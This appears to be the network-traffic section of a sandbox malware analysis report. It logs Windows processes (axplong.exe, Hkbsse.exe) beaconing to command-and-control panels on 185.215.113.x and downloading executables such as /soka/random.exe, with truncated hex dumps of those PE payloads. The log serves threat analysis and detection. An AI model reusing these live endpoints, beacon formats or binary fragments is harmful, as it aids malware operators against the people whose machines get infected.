                                                                          Host: 185.215.113.103
                                                                          Sep 27, 2024 04:21:57.192586899 CEST1236INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:57 GMT
                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                          Last-Modified: Fri, 27 Sep 2024 02:16:55 GMT
                                                                          ETag: "11d000-6231072fb785a"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 1167360
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8f 15 f6 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                          Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELf" w@0F@@@d|@eu4@.text `.rdata@@.datalpH@.rsrce@f@@.relocuvZ@B
                                                                          Sep 27, 2024 04:21:57.192611933 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68
                                                                          Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$D
                                                                          Sep 27, 2024 04:21:57.192639112 CEST1236INData Raw: 01 00 59 c3 b9 04 25 4d 00 e8 9d 98 00 00 68 3f 24 44 00 e8 d5 ef 01 00 59 c3 56 8b f1 8d 4e 18 e8 b4 87 00 00 8d 4e 08 e8 ac 87 00 00 6a 28 56 e8 e2 ec 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 83 ec 38 c7 05 30 14 4d 00 74 c9 49 00 33 d2 c7 05 9c
                                                                          Data Ascii: Y%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0M@0M\I0MH,M3MMMMYMMM3MTMXM\M`MdM
                                                                          Sep 27, 2024 04:21:57.192656994 CEST1236INData Raw: ff 76 04 e8 82 e8 01 00 8b f3 c7 87 4c fd ff ff 40 c9 49 00 59 39 9f 54 fd ff ff 0f 87 f2 0f 04 00 ff b7 50 fd ff ff 89 9f 54 fd ff ff e8 58 e8 01 00 8b f3 c7 87 3c fd ff ff 40 c9 49 00 59 39 9f 44 fd ff ff 0f 87 f1 0f 04 00 ff b7 40 fd ff ff 89
                                                                          Data Ascii: vL@IY9TPTX<@IY9D@D.,@IY9404Y$<IvY-
                                                                          Sep 27, 2024 04:21:57.192672968 CEST1236INData Raw: a2 34 15 4d 00 6a 0a 89 0d 38 15 4d 00 89 0d 3c 15 4d 00 89 0d 40 15 4d 00 a2 50 15 4d 00 66 a3 fc 16 4d 00 89 0d f4 16 4d 00 89 0d f8 16 4d 00 b9 fa 00 00 00 58 89 0d 14 17 4d 00 a3 44 15 4d 00 a3 48 15 4d 00 89 0d 4c 15 4d 00 c3 55 8b ec 57 8b
                                                                          Data Ascii: 4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q Q(Q0V&
                                                                          Sep 27, 2024 04:21:57.192691088 CEST1236INData Raw: 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb f3 8b 49 30 eb e5 55 8b ec 83 ec 18 83 65 ec 00 8d 45 ec 83 65 f4 00 56 83 ce ff
                                                                          Data Ascii: 3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3WyQ>t(M@f
                                                                          Sep 27, 2024 04:21:57.192707062 CEST1236INData Raw: 85 ba fe ff ff e9 1e 04 04 00 8b 5d fc 8d 45 ec 43 89 7d ec 50 8d 8d 6c ff ff ff 89 5d fc 47 e8 ed 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 55 f8 e9 8a fe ff ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00 8b 45 fc 48 4f 83 bd 6c ff ff ff 00 89
                                                                          Data Ascii: ]EC}Pl]GpEUAjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9HmME
                                                                          Sep 27, 2024 04:21:57.192725897 CEST1236INData Raw: 8b 06 89 07 8d 4f 10 8b 46 04 89 47 04 8b 46 08 89 47 08 8b 46 0c 89 47 0c 8d 46 10 83 61 08 00 50 e8 e0 d7 00 00 8d 46 20 8d 4f 20 83 61 08 00 50 e8 d0 d7 00 00 8b c7 5f 5e 5d c2 04 00 33 d2 33 c0 40 89 51 10 89 41 1c 89 51 18 89 41 2c 8b c1 89
                                                                          Data Ascii: OFGFGFGFaPF O aP_^]33@QAQA,Q Q(UE}}u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~
                                                                          Sep 27, 2024 04:21:57.192742109 CEST1236INData Raw: 9e f1 03 00 56 57 68 ff 7f 00 00 8d 85 00 00 ff ff 8b fa 50 ff 31 ff 15 0c c2 49 00 8b f0 8b cf 8d 85 00 00 ff ff 50 e8 7d 3d 00 00 85 f6 5f 0f 95 c0 5e c9 c3 55 8b ec b8 58 00 01 00 e8 60 f1 03 00 a0 64 13 4d 00 56 8b 75 08 57 8b f9 88 47 02 83
                                                                          Data Ascii: VWhP1IP}=_^UX`dMVuWG~"uQVqYPVw_^UtSV3MW]{uME4I]]]]xMMEhIM'nj5MM]]]
                                                                          Sep 27, 2024 04:21:57.192759991 CEST1236INData Raw: 00 00 6a 00 50 8b f9 e8 b2 f0 01 00 8b 45 14 83 c4 0c 8b 8f d0 09 00 00 33 f6 89 4d fc 6a 08 5b 6a 01 5a 2d 00 02 00 00 0f 85 eb fb 03 00 6a 40 5e 6a f5 8b cf e8 10 00 00 00 85 77 0c 0f 85 9f fc 03 00 5f 5e 5b c9 c2 10 00 55 8b ec 51 53 56 57 6a
                                                                          Data Ascii: jPE3Mj[jZ-j@^jw_^[UQSVWjYwxvU};tPuEEP_^[UVjUYa~uNN^]FHUVEPPh
                                                                          Sep 27, 2024 04:21:57.197622061 CEST1236INData Raw: 01 75 f1 83 0d 64 23 4d 00 ff b8 90 19 4d 00 5f 5e 66 89 1d 24 1b 4d 00 89 1d 28 1b 4d 00 89 1d 2c 1b 4d 00 88 1d 30 1b 4d 00 89 1d 34 1b 4d 00 89 1d 38 1b 4d 00 88 1d 3c 1b 4d 00 89 1d 40 1b 4d 00 89 1d 60 23 4d 00 5b c3 55 8b ec 56 ff 75 08 8b
                                                                          Data Ascii: ud#MM_^f$M(M,M0M4M8M<M@M`#M[UVujP@#P[^]USVW3Ex}WtKEE33ft0E}PEEf9Et#C_fu}!_^[AUSVWh


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          64192.168.2.549800185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:57.336930037 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:58.043051958 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:57 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:58.044208050 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:21:58.277681112 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:58 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          65192.168.2.549801185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:57.342617035 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:58.067030907 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:57 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:58.068169117 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:58.302548885 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:58 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          66192.168.2.549802185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:58.688625097 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:59.145734072 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:59 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:59.151907921 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:21:59.380815983 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:59 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          67192.168.2.549803185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:58.822961092 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:59.546050072 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:59 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:59.546853065 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:59.785511971 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:59 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          68192.168.2.549804185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:59.511580944 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:00.189047098 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:00 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:00.311995983 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:22:00.533335924 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:00 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          69192.168.2.549805185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:00.076937914 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:00.760850906 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:00 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:00.828676939 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:22:01.233079910 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:01 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          70192.168.2.549810185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:00.739633083 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:01.411295891 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:01 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:01.455817938 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:22:01.678328991 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:01 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          71192.168.2.549812185.215.113.1680
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:01.447321892 CEST55OUTGET /soka/random.exe HTTP/1.1
                                                                          Host: 185.215.113.16
                                                                          Sep 27, 2024 04:22:02.175348997 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:02 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 1973760
                                                                          Last-Modified: Fri, 27 Sep 2024 02:17:51 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "66f615cf-1e1e00"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 60 4e 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PEL@f`N@N2@WkANAN @.rsrc@.idata @ ,@ukgzfzxu@3@svxbhzsvPN@.taggant0`N"@
